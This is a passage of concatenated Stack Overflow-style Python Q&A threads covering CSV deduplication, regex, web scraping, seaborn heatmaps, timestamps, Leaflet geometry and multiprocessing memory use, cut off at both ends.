return self.pyaudio_stream.read(size, exception_on_overflow = False)
File "/usr/local/lib/python2.7/dist-packages/pyaudio.py", line 608, in read
return pa.read_stream(self._stream, num_frames, exception_on_overflow)
TypeError: function takes exactly 2 arguments (3 given)
Answer: You need to install pyaudio 0.2.9; it seems you have an older version.
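You can check which version is currently installed from Python (0.2.9 is the
release that added the `exception_on_overflow` keyword that speech_recognition
passes):
import pyaudio
print(pyaudio.__version__)  # should print 0.2.9 or newer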
|
Remove duplicate rows from CSV
Question: I have a CSV file that looks like this
red,75,right
red,344,right
green,3,center
yellow,3222,right
blue,9,center
black,123,left
white,68,right
green,47,left
purple,48,left
purple,988,right
pink,2677,left
white,34,right
I am using Python and am trying to remove rows that have a duplicate in cell 1.
I know I can achieve this using something like pandas but I am trying to do it
using the standard Python csv library.
Expected Result is...
red,75,right
green,3,center
yellow,3222,right
blue,9,center
black,123,left
white,68,right
purple,988,right
pink,2677,left
Anyone have an example?
Answer: You can simply use a dictionary where the color is the key and the value is
the row. Ignore the color if it is already in the dictionary, otherwise add it
and write the row to a new csv file.
import csv

file_in = 'input_file.csv'
file_out = 'output_file.csv'

with open(file_in, 'rb') as fin, open(file_out, 'wb') as fout:
    reader = csv.reader(fin)
    writer = csv.writer(fout)
    d = {}
    for row in reader:
        color = row[0]
        if color not in d:
            d[color] = row
            writer.writerow(row)
result = d.values()
result
# Output:
# [['blue', '9', 'center'],
# ['pink', '2677', 'left'],
# ['purple', '48', 'left'],
# ['yellow', '3222', 'right'],
# ['black', '123', 'left'],
# ['green', '3', 'center'],
# ['white', '68', 'right'],
# ['red', '75', 'right']]
And the output of the csv file:
!cat output_file.csv
# Output:
# red,75,right
# green,3,center
# yellow,3222,right
# blue,9,center
# black,123,left
# white,68,right
# purple,48,left
# pink,2677,left
|
Regex to strip only start of string
Question: I am trying to match a phone number using regex by stripping unwanted prefixes
like 0, *, # and +
e.g.
+*#+0#01231340010
should produce,
1231340010
I am using python re module
I tried following,
re.sub(r'[0*#+]', '', '+*#+0#01231340010')
but it is removing later 0s too.
I tried to use regex groups, but still it's not working ( or I am doing
something wrong for sure ).
Any help will be appreciated.
Thanks in advance.
Answer: Add the start of the string check (`^`) and `*` quantifier (0 or more
occurences):
>>> re.sub(r'^[0*#+]*', '', '+*#+0#01231340010')
'1231340010'
Or, a non-regex approach using
[`itertools.dropwhile()`](https://docs.python.org/2/library/itertools.html#itertools.dropwhile):
>>> from itertools import dropwhile
>>> s = '+*#+0#01231340010'
>>> not_allowed = {'0', '*', '#', '+'}
>>> ''.join(dropwhile(lambda x: x in not_allowed, s))
'1231340010'
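Since only leading characters need removing, plain `str.lstrip()` with a
character set also works here, no regex or itertools needed:
>>> '+*#+0#01231340010'.lstrip('0*#+')
'1231340010'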
|
Scraping text from multiple web pages in Python
Question: I've been tasked to scrape all the text off of any webpage a certain client of
ours hosts. I've managed to write a script that will scrape the text off a
single webpage, and you can manually replace the URL in the code each time you
want to scrape a different webpage. But obviously this is very inefficient.
Ideally, I could have Python connect to some list that contains all the URLs I
need and it would iterate through the list and print all the scraped text into
a single CSV. I've tried to write a "test" version of this code by creating a
2 URL long list and trying to get my code to scrape both URLs. However, as you
can see, my code only scrapes the most recent url in the list and does not
hold onto the first page it scraped. I think this is due to a deficiency in my
print statement since it will always write over itself. Is there a way to have
everything I scraped held somewhere until the loop goes through the entire
list AND then print everything?
Feel free to totally dismantle my code. I know nothing of computer languages.
I just keep getting assigned these tasks and use Google to do my best.
import urllib.request
import re
from bs4 import BeautifulSoup

data_file_name = 'C:\\Users\\confusedanalyst\\Desktop\\python_test.csv'
urlTable = ['url1', 'url2']

def extractText(string):
    page = urllib.request.urlopen(string)
    soup = BeautifulSoup(page, 'html.parser')

    ##Extracts all paragraph and header variables from URL as GroupObjects
    text = soup.find_all("p")
    headers1 = soup.find_all("h1")
    headers2 = soup.find_all("h2")
    headers3 = soup.find_all("h3")

    ##Forces GroupObjects into str
    text = str(text)
    headers1 = str(headers1)
    headers2 = str(headers2)
    headers3 = str(headers3)

    ##Strips HTML tags and brackets from extracted strings
    text = text.strip('[')
    text = text.strip(']')
    text = re.sub('<[^<]+?>', '', text)

    headers1 = headers1.strip('[')
    headers1 = headers1.strip(']')
    headers1 = re.sub('<[^<]+?>', '', headers1)

    headers2 = headers2.strip('[')
    headers2 = headers2.strip(']')
    headers2 = re.sub('<[^<]+?>', '', headers2)

    headers3 = headers3.strip('[')
    headers3 = headers3.strip(']')
    headers3 = re.sub('<[^<]+?>', '', headers3)

    print_to_file = open(data_file_name, 'w', encoding='utf')
    print_to_file.write(text + headers1 + headers2 + headers3)
    print_to_file.close()

for i in urlTable:
    extractText(i)
Answer: Try this: 'w' will open the file with a pointer at the beginning of the
file. You want the pointer at the end of the file:
`print_to_file = open (data_file_name, 'a' , encoding = 'utf')`
Here are all of the different read and write modes for future reference.
The argument mode points to a string beginning with one of the following
sequences (Additional characters may follow these sequences.):
``r'' Open text file for reading. The stream is positioned at the
beginning of the file.
``r+'' Open for reading and writing. The stream is positioned at the
beginning of the file.
``w'' Truncate file to zero length or create text file for writing.
The stream is positioned at the beginning of the file.
``w+'' Open for reading and writing. The file is created if it does not
exist, otherwise it is truncated. The stream is positioned at
the beginning of the file.
``a'' Open for writing. The file is created if it does not exist. The
stream is positioned at the end of the file. Subsequent writes
to the file will always end up at the then current end of file,
irrespective of any intervening fseek(3) or similar.
``a+'' Open for reading and writing. The file is created if it does not
exist. The stream is positioned at the end of the file. Subse-
quent writes to the file will always end up at the then current
end of file, irrespective of any intervening fseek(3) or similar.
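Alternatively, if `extractText` is changed to _return_ its combined string
instead of opening the file itself, you can open the file once in plain 'w'
mode outside the loop; a sketch reusing the question's names:
with open(data_file_name, 'w', encoding='utf-8') as out:
    for url in urlTable:
        out.write(extractText(url))  # assumes extractText now returns the text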
|
Problems using HTTPSConnection with http.client
Question: I'm new to Python and especially to web coding. I'm trying to make a program
that asks for a name and a surname, and then checks on Pipl if there are any
result(s). My "tactic" is to directly go to the URL (containing the
information) with the result, without using the POST method to complete the
fields of the website. I tried this:
import http.client
name = input("Name: ")
surname = input("Surname: ")
url = "pipl.com/search/?q=" + name + "+" + surname + "&l=&sloc=&in=5"
conn = http.client.HTTPSConnection(url, 443)
conn.putrequest('GET', '/')
conn.endheaders()
r = conn.getresponse()
print(r.read())
And I'm getting this error:
> socket.gaierror: [Errno -2] Name or service not known
I think that's because I'm not using only the domain name (pipl.com), but
nothing has helped me; I'm still stuck here.
I also told myself that using POST might be easier. I repeat, I'm very
new to web coding (and my English isn't the best); I'm learning, so thanks
for your help!
Answer: The best way by all means is using the PIPL code libraries. Still, if you want
something that's more "quick and dirty", use the python 'requests' library
(<http://docs.python-requests.org/en/master/>) which can be installed with pip
and gives you what you need with ease. I took your initial code and came up
with this:
import requests
name = input("Name: ")
surname = input("Surname: ")
url = "http://api.pipl.com/search/?first_name=" + name + "&last_name=" + surname + "&key=sample_key"
response = requests.get(url)
print (response.json())
The end results is the json response from the API. Read more about the API
possible responses at <https://pipl.com/dev/reference/#response>
|
Accessing deeply nested dictionary/list elements/values in Python
Question: I've been racking my brain on this problem and the logic needed to step
through this output from Google Maps API.
Essentially I'm using google maps Distance_Matrix: Here is an example of the
returned information from a call of the API for distance/time between two
addresses, which I've assigned to variable _distanceMatrixReturn_ for this
example.
distanceMatrixReturn = {
{'destination_addresses': ['This would be ADDRESS 1'],
'status': 'OK',
'rows': [
{
'elements': [
{
'duration_in_traffic': {
'text': '10 mins', 'value': 619},
'status': 'OK',
'distance': {'text': '2.8 mi', 'value': 4563},
'duration': {'text': '9 mins', 'value': 540}}]}],
}]
}],
'origin_addresses': ['This would be ADDRESS 2']
}
Now, being a python newbie struggling with nested dictionaries and lists; Here
is my thought process:
I want to access the value `'2.8 mi'` that to my impression, is within a
dictionary tied to the key 'text', which is in turn inside a dictionary
assigned to the key `'distance'`, which is in another dictionary with the key
`'duration_in_traffic'`.
The key `'duration_in_traffic'` seems to be within a list, tied to the
dictionary key `'elements'`, which in turn is in a list tied to another
dictionary key, `'rows'`.
Now, this seems very very convoluted and there must be an easy way to handle
this situation, or maybe my logic is just off about the nested within nested
elements and the method of accessing them.
For example, among other posts here, I've read the following to try and figure
out the process of interpreting something seemingly similar. [How to access a
dictionary key value present inside a
list?](http://stackoverflow.com/questions/6521892/how-to-access-a-dictionary-
key-value-present-inside-a-list)
Please let me know if I structured the distanceMatrixReturn on this post
poorly. I spaced it to try and make it more readable, I hope I've achieved
that.
Answer: Your dictionary is broken, so it's hard to imagine the right path. Anyway.
from operator import getitem
path = ["rows", 0, "elements", 0, "duration_in_traffic", "distance", "text"]
reduce(getitem, path, distanceMatrixReturn) # -> "2.8 mi"
On Python 3 you will have to import `reduce` from `functools` first.
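i.e., the Python 3 version (reusing the same guessed path) would be:
from functools import reduce
from operator import getitem

path = ["rows", 0, "elements", 0, "duration_in_traffic", "distance", "text"]
print(reduce(getitem, path, distanceMatrixReturn))  # -> "2.8 mi"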
|
How to create a UNIX timestamp for every minute in Python
Question: I want to create a UNIX timestamp for the date `2014-10-31` for every minute
of the day. I have got a timestamp for the date but not for every minute -
import datetime
date = '2014-10-31'
t_stamp = int(time.mktime(datetime.datetime.strptime(date, "%Y-%m-%d").timetuple()))
print t_stamp
I want to save all these entries in a file which I need to access later to get
specific entries only.
If I need to access one of the timestamp records using a date and specific
time, how can it be done? For example, I need to find the entries for
`2014-10-31` for the time between `20:00` and `20:05`, how can it be done?
Any help would be appreciated!
Updated:
import datetime
import ipaddress
from random import randint
for x in ip_range.hosts():
    for h in range(24):  # 24 hours
        for i in range(60):  # 60 minutes
            f.write(str(t_stamp)+'\t'+str(x)+'\t0\t'+str(randint(0,100))+'%\n')
            f.write(str(t_stamp)+'\t'+str(x)+'\t1\t'+str(randint(0,100))+'%\n')
            t_stamp += 60  # one minute
Now I am looking to create a log file for every minute. How can that be done?
Answer:
t_stamp = int(time.mktime(datetime.datetime.strptime(date, "%Y-%m-%d").timetuple()))
for h in range(24):  # 24 hours
    for i in range(60):  # 60 minutes
        print t_stamp
        t_stamp += 60  # one minute
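To later pull entries for a date and time window (e.g. 2014-10-31 between
20:00 and 20:05), convert both endpoints to timestamps the same way and filter
the file; a sketch assuming the tab-separated layout of your updated code,
with the timestamp in the first column and a hypothetical file name:
import time
import datetime

def to_ts(s):
    return int(time.mktime(datetime.datetime.strptime(s, "%Y-%m-%d %H:%M").timetuple()))

lo = to_ts("2014-10-31 20:00")
hi = to_ts("2014-10-31 20:05")
with open("sensor_log.txt") as f:
    wanted = [line for line in f if lo <= int(line.split("\t")[0]) <= hi]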
|
why is this formula for a circle giving me an ellipsoid in Javascript but a circle in Python?
Question: I adapted the following code for python found on this
[page](http://stackoverflow.com/a/15890673/2075859): for a Javascript
equivalent.
import math

# inputs
radius = 1000.0  # m - the following code is an approximation that stays reasonably accurate for distances < 100km
centerLat = 30.0  # latitude of circle center, decimal degrees
centerLon = -100.0  # Longitude of circle center, decimal degrees

# parameters
N = 10  # number of discrete sample points to be generated along the circle

# generate points
circlePoints = []
for k in xrange(N):
    # compute
    angle = math.pi*2*k/N
    dx = radius*math.cos(angle)
    dy = radius*math.sin(angle)
    point = {}
    point['lat'] = centerLat + (180/math.pi)*(dy/6378137)
    point['lon'] = centerLon + (180/math.pi)*(dx/6378137)/math.cos(centerLat*math.pi/180)
    # add to list
    circlePoints.append(point)

print circlePoints
The distance between these points is constant, as it should be.
My JS version is, as far as I know, equivalent:
var nodesCount = 8;
var coords = [];
for (var i = 0; i <= nodesCount; i++) {
    var radius = 1000;
    var angle = Math.PI*2*i/nodesCount;
    var dx = radius*Math.cos(angle);
    var dy = radius*Math.sin(angle);
    coords.push([(rootLongitude + (180 / Math.PI) * (dx / EARTH_RADIUS) / Math.cos(rootLatitude * Math.PI / 180)),(rootLatitude + (180 / Math.PI) * (dy / EARTH_RADIUS))]);
}
But when I output this, the coordinates are not equidistant from the center.
This is enormously frustrating -- I've been trying to debug this for a day.
Can anyone see what's making the JS code fail?
Answer: You somehow got lat/lon reversed.
var linkDistance = 10; //$('#linkDistance').val();
var nodesCount = 8;
var bandwidth = "10 GB/s";
var centerLat = 35.088878;
var centerLon = -106.65262;
var EARTH_RADIUS = 6378137;

var mymap = L.map('mapid').setView([centerLat, centerLon], 11);
L.tileLayer('https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}.png?access_token=pk.eyJ1IjoibWFwYm94IiwiYSI6ImNpandmbXliNDBjZWd2M2x6bDk3c2ZtOTkifQ._QA7i5Mpkd_m30IGElHziw', {
    maxZoom: 18,
    attribution: 'Map data © <a href="http://openstreetmap.org">OpenStreetMap</a> contributors, ' +
        '<a href="http://creativecommons.org/licenses/by-sa/2.0/">CC-BY-SA</a>, ' +
        'Imagery © <a href="http://mapbox.com">Mapbox</a>',
    id: 'mapbox.streets'
}).addTo(mymap);

function drawNext(centerLat, centerLon) {
    var coords = [];
    for (var i = 0; i < nodesCount; i++) {
        var radius = linkDistance * 1000;
        var angle = Math.PI * 2 * i / nodesCount;
        var dx = radius * Math.cos(angle);
        var dy = radius * Math.sin(angle);
        var lat = centerLon + (180 / Math.PI) * (dy / 6378137);
        var lon = centerLat + (180 / Math.PI) * (dx / 6378137) / Math.cos(centerLon * Math.PI / 180);
        coords.push([lat, lon]);
    }
    for (var i = 0; i < coords.length; i++) {
        new L.Circle(coords[i], 500, {
            color: 'black',
            fillColor: '#f03',
            fillOpacity: 0.1
        }).addTo(mymap);
        console.log("added circle to: " + coords[i]);
    }
}

drawNext(centerLon, centerLat);

var popup = L.popup();
function onMapClick(e) {
    popup
        .setLatLng(e.latlng)
        .setContent("You clicked the map at " + e.latlng.toString())
        .openOn(mymap);
}
mymap.on('click', onMapClick);

#mapid {
    height: 500px;
}
<script src="https://npmcdn.com/leaflet@1.0.0-rc.2/dist/leaflet-src.js"></script>
<link href="https://npmcdn.com/leaflet@1.0.0-rc.2/dist/leaflet.css" rel="stylesheet"/>
<div id="mapid"></div>
|
Get location from response header
Question: I am trying to get the `Location` value from a `POST` request using python's
requests module. However, when I look at the response's headers, I don't see
any such key. Performing the same request using Google Chrome does show the
key.
This is where I am trying to download data from: <https://data.police.uk/data>
. Launch this in Google Chrome and open the Developer Tools. When you select a
date range, select some force and click `Generate File`, you can see a `POST`
request being made with a `Location` key in the Response header.
import requests
from urlparse import urlparse, urljoin
BASE = 'https://data.police.uk'
FORM_PATH = 'data'
form_url = urljoin(BASE, FORM_PATH)
# Get data download URL
client = requests.session()
try:
    client.get(form_url)
except requests.exceptions.ConnectionError as e:
    print (e)
    sys.exit()
csrftoken = client.cookies.values()
l = [('forces', 'cleveland')]
t = ('csrfmiddlewaretoken', csrftoken[0])
d_from = ('date_from', '2014-05')
d_to = ('date_to', '2016-05')
l.extend((t, d_from, d_to))
r = client.post(form_url, headers=dict(Referer=form_url), data=l)
Querying the response headers gives me:
In [4]: r.headers
Out[4]: {'Content-Length': '4332', 'Content-Language': 'en-gb', 'Content-Encoding': 'gzip', 'Set-Cookie': 'csrftoken=aGQ7kO4tQ2cPD0Fp2svxxYBRe4rAk0kw; expires=Thu, 03-Aug-2017 22:11:44 GMT; Max-Age=31449600; Path=/', 'Vary': 'Cookie, Accept-Language', 'Server': 'nginx', 'Connection': 'keep-alive', 'Date': 'Thu, 04 Aug 2016 22:11:44 GMT', 'Content-Type': 'text/html; charset=utf-8'}
Question: How do I get the `Location` key from the response header?
**EDIT**
Answer: Had to specify `l.append(['include_crime', 'on'])`. Works after this.
Answer: # EDIT2
You need to pass the `include_crime=on` field as well, since you are not
selecting any dataset. On the webpage, if you don't select any checkbox, you
will get the same page back and you will not get any Location header. That is
why your r.content has "Please select at least one dataset".
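Concretely, with the asker's edit applied before the POST ('on' is what the
browser sends for a ticked checkbox):
l.append(('include_crime', 'on'))  # at least one dataset must be selected
r = client.post(form_url, headers=dict(Referer=form_url), data=l)
print(r.headers.get('Location'))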
|
Python script for web scraping from web pages to find ip address for urls present in it
Question: I have started writing a script as shown below
import urllib2
from bs4 import BeautifulSoup
trg_url='http://timesofindia.indiatimes.com/'
req=urllib2.Request(trg_url)
handle=urllib2.urlopen(req)
page_content=handle.read()
soup=BeautifulSoup(page_content,"html")
new_list=soup.find_all('a')
for link in new_list:
    print link.get('href')
but now I am stuck, as I am getting the output below:
http://mytimes.indiatimes.com/?channel=toi
https://www.facebook.com/TimesofIndia
https://twitter.com/timesofindia
https://plus.google.com/117150671992820587865?prsrc=3
http://timesofindia.indiatimes.com/rss.cms
https://www.youtube.com/user/TimesOfIndiaChannel
javascript:void(0);
http://timesofindia.indiatimes.com
javascript://
http://beautypageants.indiatimes.com/
http://photogallery.indiatimes.com/
http://timesofindia.indiatimes.com/videos/entertainment/videolist/3812908.cms
javascript://
/life/fashion/articlelistls/2886715.cms
/life-style/relationship/specials/lsspeciallist/6247311.cms
/debatelist/3133631.cms
Please guide me on extracting the different URLs present in the web page and
their IP addresses.
Answer: Use the socket module to get the ip address:
import urllib2
from bs4 import BeautifulSoup
import socket
import csv

trg_url = 'http://timesofindia.indiatimes.com/'
req = urllib2.Request(trg_url)
handle = urllib2.urlopen(req)
page_content = handle.read()

soup = BeautifulSoup(page_content, "lxml")
new_list = soup.find_all('a')

final_list = []
for link in new_list:
    l = link.get('href')
    try:
        final_list.append([l, socket.gethostbyname(l.split('/')[2])])
    except:
        final_list.append([l, []])

with open('output.csv', 'wb') as f:
    wr = csv.writer(f)
    for row in final_list:
        wr.writerow(row)
|
I typed python -v in my terminal and something weird happened
Question: Thinking I was about to check the version of Python installed on my computer,
I typed
python -v
in my terminal and I got a first line saying
> "installing zipimport hook", but then also a whole bunch of text (probably
> 50 or so lines of text), among which "import errno # builtin", "import posix
> # builtin", "import _codecs # builtin", and toward the end "Python 2.7.8
> |Anaconda 2.1.0 (x86_64)| (default, Aug 21 2014, 15:21:46)"
What did I do? And what did that command install?
**EDIT** : the `v` I typed in `python -v` was a lowercase `v`. When I now try
an uppercase `V`, I do get the version of Python on my computer.
Answer: You want `python -V` (uppercase) or `python --version`. The lowercase `-v`
means “verbose” and adds a bunch of diagnostic information to the output that
you can safely ignore.
|
How to retrieve a total pixel value above an average-based threshold in Python
Question: Currently, I am practicing with retrieving the total of the pixel values above
a threshold based on the mean of the whole image. (I am very new to Python.) I
am using Python 3.5.2, and the code below was copied from the Atom editor I
am using to write and experiment with the code.
For the time being, I am just practicing with the red channel - but
eventually, I will need to individually analyse all colour channels.
The complete code that I am using so far:
import os
from skimage import io
from tkinter import *
from tkinter.filedialog import askopenfilename

def callback():
    M = askopenfilename()  # to select a file
    image = io.imread(M)  # to read the selected file
    red = image[:,:,0]  # selecting the red channel
    red_av = red.mean()  # average pixel value of the red channel
    threshold = red_av + 100  # setting the threshold value
    red_val = red > threshold
    red_sum = sum(red_val)
    print(red_sum)

Button(text = 'Select Image', command = callback).pack(fill = X)
mainloop()
Now, everything works so far, except when I run the program, red_sum comes out
to be the number of pixels above the threshold, not the total of the pixels.
What am I missing? I am thinking that my (possibly naive) way of declaring
the `red_val` variable has something to do with it.
But, how do I retrieve the total pixel value above the threshold?
Answer: When you did (red > threshold) you got a mask in which all the pixels in red
that are above the threshold get the value 1, and 0 otherwise. Now, to get the
values, you can just multiply the mask with the red channel. The multiplication
will zero all the values that are less than the threshold and will leave the
values over the threshold unchanged.
The code:
red_val = (red > threshold)*red
red_sum = red_val.sum()  # the array's own .sum() returns a single scalar
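Equivalently, boolean indexing picks out the qualifying pixels directly, which
sidesteps both the multiplication and the builtin-`sum` pitfall (the builtin
`sum()` on a 2D array sums row-wise instead of giving one number):
red_sum = red[red > threshold].sum()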
|
generate a heatmap from a dataframe with python and seaborn
Question: I'm new to Python and fairly new to seaborn.
I have a pandas dataframe named df which looks like:
TIMESTAMP ACT_TIME_AERATEUR_1_F1 ACT_TIME_AERATEUR_1_F2 ACT_TIME_AERATEUR_1_F3 ACT_TIME_AERATEUR_1_F4 ACT_TIME_AERATEUR_1_F5 ACT_TIME_AERATEUR_1_F6
2015-08-01 23:00:00 80 0 0 0 10 0
2015-08-01 23:20:00 60 0 20 0 10 10
2015-08-01 23:40:00 80 10 0 0 10 10
2015-08-01 00:00:00 60 10 20 40 10 10
df.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 38840 entries, 0 to 38839
Data columns (total 7 columns):
TIMESTAMP 38840 non-null datetime64[ns]
ACT_TIME_AERATEUR_1_F1 38696 non-null float64
ACT_TIME_AERATEUR_1_F3 38697 non-null float64
ACT_TIME_AERATEUR_1_F5 38695 non-null float64
ACT_TIME_AERATEUR_1_F6 38695 non-null float64
ACT_TIME_AERATEUR_1_F7 38693 non-null float64
ACT_TIME_AERATEUR_1_F8 38696 non-null float64
dtypes: datetime64[ns](1), float64(6)
memory usage: 2.1 MB
I try to do a heatmap using this code :
data = sns.load_dataset("df")
# Draw a heatmap with the numeric values in each cell
sns.heatmap(data, annot=True, fmt="d", linewidths=.5)
But it does not work. Can you please help me find the error?
Thanks
**Edit** First , I load dataframe from csv file :
df1 = pd.read_csv('C:/Users/Demonstrator/Downloads/Listeequipement.csv',delimiter=';', parse_dates=[0], infer_datetime_format = True)
Then, I select only the rows whose date lies between '2015-08-01 23:10:00' and
'2015-08-02 00:00:00':
import seaborn as sns
df1['TIMESTAMP']= pd.to_datetime(df1_no_missing['TIMESTAMP'], '%d-%m-%y %H:%M:%S')
df1['date'] = df_no_missing['TIMESTAMP'].dt.date
df1['time'] = df_no_missing['TIMESTAMP'].dt.time
date_debut = pd.to_datetime('2015-08-01 23:10:00')
date_fin = pd.to_datetime('2015-08-02 00:00:00')
df1 = df1[(df1['TIMESTAMP'] >= date_debut) & (df1['TIMESTAMP'] < date_fin)]
Then, construct the heatmap :
sns.heatmap(df1.iloc[:,2:],annot=True, fmt="d", linewidths=.5)
I get this error :
I get this traceback:
TypeError                                 Traceback (most recent call last)
<ipython-input-363-a054889ebec3> in <module>()
      7 df1 = df1[(df1['TIMESTAMP'] >= date_debut) & (df1['TIMESTAMP'] < date_fin)]
      8
----> 9 sns.heatmap(df1.iloc[:,2:],annot=True, fmt="d", linewidths=.5)

C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in heatmap(data, vmin, vmax, cmap, center, robust, annot, fmt, annot_kws, linewidths, linecolor, cbar, cbar_kws, cbar_ax, square, ax, xticklabels, yticklabels, mask, **kwargs)
    483     plotter = _HeatMapper(data, vmin, vmax, cmap, center, robust, annot, fmt,
    484                           annot_kws, cbar, cbar_kws, xticklabels,
--> 485                           yticklabels, mask)
    486
    487     # Add the pcolormesh kwargs here

C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in __init__(self, data, vmin, vmax, cmap, center, robust, annot, fmt, annot_kws, cbar, cbar_kws, xticklabels, yticklabels, mask)
    165         # Determine good default values for the colormapping
    166         self._determine_cmap_params(plot_data, vmin, vmax,
--> 167                                     cmap, center, robust)
    168
    169         # Sort out the annotations

C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in _determine_cmap_params(self, plot_data, vmin, vmax, cmap, center, robust)
    202                                 cmap, center, robust):
    203         """Use some heuristics to set good defaults for colorbar and range."""
--> 204         calc_data = plot_data.data[~np.isnan(plot_data.data)]
    205         if vmin is None:
    206             vmin = np.percentile(calc_data, 2) if robust else calc_data.min()

TypeError: ufunc 'isnan' not supported for the input types, and the inputs
could not be safely coerced to any supported types according to the casting
rule ''safe''
Answer: Remove the timestamp variables (i.e. the first two columns) before passing the
frame to sns.heatmap; there is no need for load_dataset either, just use:
sns.heatmap(df.iloc[:,2:],annot=True, fmt="d", linewidths=.5)
# EDIT
Ok here is your dataframe, just changed the column names in the interest of
time
df
Out[9]:
v1 v2 v3 v4 v5 v6 v7 v8
0 2015-08-01 23:00:00 80 0 0 0 10 0
1 2015-08-01 23:20:00 60 0 20 0 10 10
2 2015-08-01 23:40:00 80 10 0 0 10 10
3 2015-08-01 00:00:00 60 10 20 40 10 10
Now, seaborn cannot recognize timestamp variables for the heatmap, so we
will remove the first two columns and pass the dataframe to seaborn:
import seaborn as sns
sns.heatmap(df.iloc[:,2:],annot=True, fmt="d", linewidths=.5)
So we get the result as
[![Output from
seaborn](http://i.stack.imgur.com/9BzZK.png)](http://i.stack.imgur.com/9BzZK.png)
If you don't get the result using this, please edit your question to
include the rest of your code; the problem lies elsewhere then.
|
How can I count a word from all lines that are 2 rows after a specific line?
Question: So, this might sound a bit confusing, I'll try to explain it. For example from
these lines:
next line 1
^^^^^^^^^^^^^^^^^^
red blue dark ten lemon
next line 2
^^^^^^^^^^^^^^^^^^^
hat 45 no dad fate orange
next line 3
^^^^^^^^^^^^^^^^^^^
tan rat lovely lemon eat
you him lemon Daniel her"
I am only interested in the count of "lemon" from lines that have "next line"
two lines above it. So, the output I expect is "2 lemons".
Any help will be greatly appreciated!
My attempt so far is:
#!/usr/bin/env python
#import the numpy library
import numpy as np

lemon = 0
logfile = open('file','r')
for line in logfile:
    words = line.split()
    words = np.array(words)
    if np.any(words == 'next line'):
        if np.any(words == 'lemon'):
            lemon += 1

print "Total number of lemons is %d" % (lemon)
but this counts "lemon" only if it's on the same line as "next line".
Answer: For each line you need to be able to access to two line before it. For that
aim you can use `itertools.tee` in order to create two independent file object
(which are iterator-like objects) then use `itertools.izip()` in order to
create your your expected pairs:
from itertools import tee, izip

with open('file') as logfile:
    spam, logfile = tee(logfile)
    # consume first two lines of spam
    next(spam)
    next(spam)
    for pre, line in izip(logfile, spam):
        if 'next line' in pre:
            print line.count('lemon')
Or if you just want to count the lines you can use a generator expression
within `sum()`:
from itertools import tee, izip

with open('file') as logfile:
    spam, logfile = tee(logfile)
    # consume first two lines of spam
    next(spam)
    next(spam)
    print sum(line.count('lemon') for pre, line in izip(logfile, spam) if 'next line' in pre)
|
Proper Use Of Python 3.x AMFY Module
Question: How am I supposed to use the Amfy module? I try to use it like the JSON module
(`amfy.loads` or `amfy.load`), but it just gives me errors:
C:\Users\Other>"C:\Users\Other\Desktop\Python3.5.2\test amf.py"
Traceback (most recent call last):
File "C:\Users\Other\Desktop\Python3.5.2\test amf.py", line 4, in <module>
print(amfy.load(cn_rsp.text))
File "C:\Users\Other\Desktop\Python3.5.2\lib\site-packages\amfy\__init__.py", line 9, in load
return Loader().load(input, proto=proto)
File "C:\Users\Other\Desktop\Python3.5.2\lib\site-packages\amfy\core.py", line 33, in load
return self._read_item3(stream, context)
File "C:\Users\Other\Desktop\Python3.5.2\lib\site-packages\amfy\core.py", line 52, in _read_item3
marker = stream.read(1)[0]
AttributeError: 'str' object has no attribute 'read'
this is what I wrote:
import requests
import amfy
cn_rsp = requests.get("http://realm498.c10.castle.rykaiju.com/api/locales/en/get_serialized_new")
print(amfy.load(cn_rsp.text))
Answer: The `load` method expects an input stream, but you provide it a string. Just
convert your string into a memory buffer which supports the `read` method,
like this:
import io
print(amfy.load(io.BytesIO(cn_rsp.text.encode())))
unfortunately serialization fails when using this. Is there another url where
it would work, a test URL maybe?
File "C:\Python34\lib\site-packages\amfy\core.py", line 146, in _read_vli
byte = stream.read(1)[0]
IndexError: index out of range
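One more thing worth trying: since AMF is a binary format, feed the raw bytes
instead of re-encoding the decoded text; going through `.text` and `.encode()`
can mangle the payload, and that is one plausible cause of the IndexError (an
assumption, not verified against this URL):
print(amfy.load(io.BytesIO(cn_rsp.content)))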
|
python multiprocessing.Array: huge temporary memory overhead
Question: If I use python's multiprocessing.Array to create a 1G shared array, I find
that the python process uses around 30G of memory during the call to
multiprocessing.Array and then decreases memory usage after that. I'd
appreciate any help to figure out why this is happening and to work around it.
Here is code to reproduce it on Linux, with memory monitored by smem:
import multiprocessing
import ctypes
import numpy
import time
import subprocess
import sys

def get_smem(secs, by):
    for t in range(secs):
        print subprocess.check_output("smem")
        sys.stdout.flush()
        time.sleep(by)

def allocate_shared_array(n):
    data = multiprocessing.Array(ctypes.c_ubyte, range(n))
    print "finished allocating"
    sys.stdout.flush()

n = 10**9
secs = 30
by = 5
p1 = multiprocessing.Process(target=get_smem, args=(secs, by))
p2 = multiprocessing.Process(target=allocate_shared_array, args=(n,))
p1.start()
p2.start()
print "pid of allocation process is", p2.pid
p1.join()
p2.join()
p1.terminate()
p2.terminate()
Here is output:
pid of allocation process is 2285
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1080 4566 11924
2286 ubuntu /usr/bin/python /usr/bin/sm 0 4688 5573 7152
2276 ubuntu python test.py 0 4000 8163 16304
2285 ubuntu python test.py 0 137948 141431 148700
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1188 4682 12052
2287 ubuntu /usr/bin/python /usr/bin/sm 0 4696 5560 7160
2276 ubuntu python test.py 0 4016 8174 16304
2285 ubuntu python test.py 0 13260064 13263536 13270752
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1188 4682 12052
2288 ubuntu /usr/bin/python /usr/bin/sm 0 4692 5556 7156
2276 ubuntu python test.py 0 4016 8174 16304
2285 ubuntu python test.py 0 21692488 21695960 21703176
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1188 4682 12052
